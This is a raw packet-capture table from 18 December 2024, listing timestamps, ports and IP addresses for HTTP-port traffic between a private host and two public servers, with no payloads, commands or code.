Dec 18, 2024 13:38:14.347556114 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.347601891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.347661972 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.348491907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.348552942 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.348617077 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.349605083 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.349659920 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.349791050 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.349838018 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.350457907 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.350507021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.350652933 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.350697994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.351569891 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.351624012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.351679087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.351732969 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.352446079 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.352498055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.352564096 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.352610111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.353467941 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.353564024 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.353734970 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.354465008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.354518890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.354584932 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.354633093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.355477095 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.355525970 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.355545044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.355585098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.356504917 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.356576920 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.356700897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.357455969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.357500076 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.357554913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.357597113 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.358529091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.358580112 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.358652115 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.358692884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:14.359451056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:14.359493971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:16.599229097 CET	49707	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:16.599561930 CET	49709	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:16.719526052 CET	80	49707	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:16.719568014 CET	80	49709	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:16.719594955 CET	49707	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:16.719645977 CET	49709	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:16.721292019 CET	49709	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:16.840924025 CET	80	49709	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:18.054625034 CET	80	49709	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:18.056255102 CET	49709	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:18.057748079 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:18.058099031 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:18.178018093 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:18.178112984 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:18.178359985 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:18.184365988 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:18.184545994 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:18.298219919 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504157066 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504312038 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504323006 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504324913 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504369974 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504471064 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504484892 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504498005 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504530907 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504554033 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504807949 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504842043 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504854918 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504862070 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504868984 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.504878044 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504899025 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.504911900 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.625646114 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.625663042 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.625711918 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.629754066 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.629815102 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.696357965 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.696614981 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.696751118 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.700525045 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.700715065 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.700794935 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.707025051 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.707119942 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.707192898 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.715365887 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.715461969 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.715483904 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.715547085 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.723788977 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.723850965 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.723884106 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.723932981 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.732369900 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.732422113 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.732445002 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.732494116 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.740515947 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.740567923 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.740668058 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.740709066 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.749252081 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.749295950 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.749306917 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.749349117 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.757380009 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.757430077 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.757476091 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.757525921 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.765094042 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.765146017 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.765352011 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.765405893 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.772759914 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.772847891 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.772864103 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.772917986 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.888365030 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.888427973 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.888427973 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.888478994 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.889585972 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.889638901 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.889724970 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.889770031 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.894426107 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.894474983 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.894484997 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.894530058 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.899013996 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.899053097 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.899072886 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.899085045 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.903618097 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.903671980 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.903759956 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.903810024 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.908188105 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.908246040 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.908309937 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.908361912 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.912820101 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.912875891 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.912908077 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.912957907 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.917375088 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.917426109 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.917454958 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.917501926 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.921932936 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.921988010 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.922019958 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.922065020 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.926501036 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.926553965 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.926561117 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.926606894 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.931075096 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.931124926 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.931165934 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.931210041 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.935678959 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.935739040 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.935798883 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.935849905 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.940460920 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.940517902 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.940521002 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.940566063 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.944896936 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.944955111 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.945049047 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.945101976 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.949368000 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.949421883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.949625015 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.949682951 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.954058886 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.954108953 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.954178095 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.954224110 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.958573103 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.958626032 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.958689928 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.958734989 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.963177919 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.963231087 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:19.963324070 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:19.963367939 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.080229044 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.080291986 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.080334902 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.080385923 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.082143068 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.082195997 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.082245111 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.082283974 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.085112095 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.085164070 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.085257053 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.085306883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.088912964 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.088975906 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.088980913 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.089030981 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.092741013 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.092792034 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.092870951 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.092922926 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.096467018 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.096514940 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.096606970 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.096652031 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.100172043 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.100225925 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.100261927 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.100305080 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.103857040 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.103908062 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.104012012 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.104058981 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.107654095 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.107698917 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.107784986 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.107831955 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.111567020 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.111583948 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.111619949 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.111637115 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.115741014 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.115899086 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.115936041 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.115987062 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.119741917 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.119793892 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.119913101 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.119963884 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.123297930 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.123322010 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.123349905 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.123367071 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.126291037 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.126343012 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.126434088 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.126482010 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.129823923 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.129877090 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.129884958 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.129931927 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.133430004 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.133479118 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.133563995 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.133613110 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.137136936 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.137191057 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.137212038 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.137263060 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.141025066 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.141041040 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.141076088 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.141093016 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.144633055 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.144682884 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.144727945 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.144779921 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.148206949 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.148252964 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.148344994 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.148389101 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.152084112 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.152110100 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.152137041 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.152164936 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.155910969 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.155961990 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.156181097 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.156225920 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.159323931 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.159370899 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.159508944 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.159557104 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.163242102 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.163294077 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.163558960 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.163603067 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.166819096 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.166897058 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.166973114 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.167022943 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.170437098 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.170489073 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.170533895 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.170578957 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.174309969 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.174375057 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.272171021 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.272218943 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.272254944 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.272288084 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.273597002 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.273665905 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.274267912 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.274296999 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.274319887 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.274338007 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.277292013 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.277348042 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.277379036 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.277431011 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.280436039 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.280494928 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.280509949 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.280558109 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.283754110 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.283822060 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.283859968 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.283915997 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.286741018 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.286777973 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.286798000 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.286825895 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.290144920 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.290174007 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.290218115 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.290241003 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.292598963 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.292643070 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.292664051 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.292685032 CET	49710	80	192.168.2.8	31.41.244.11
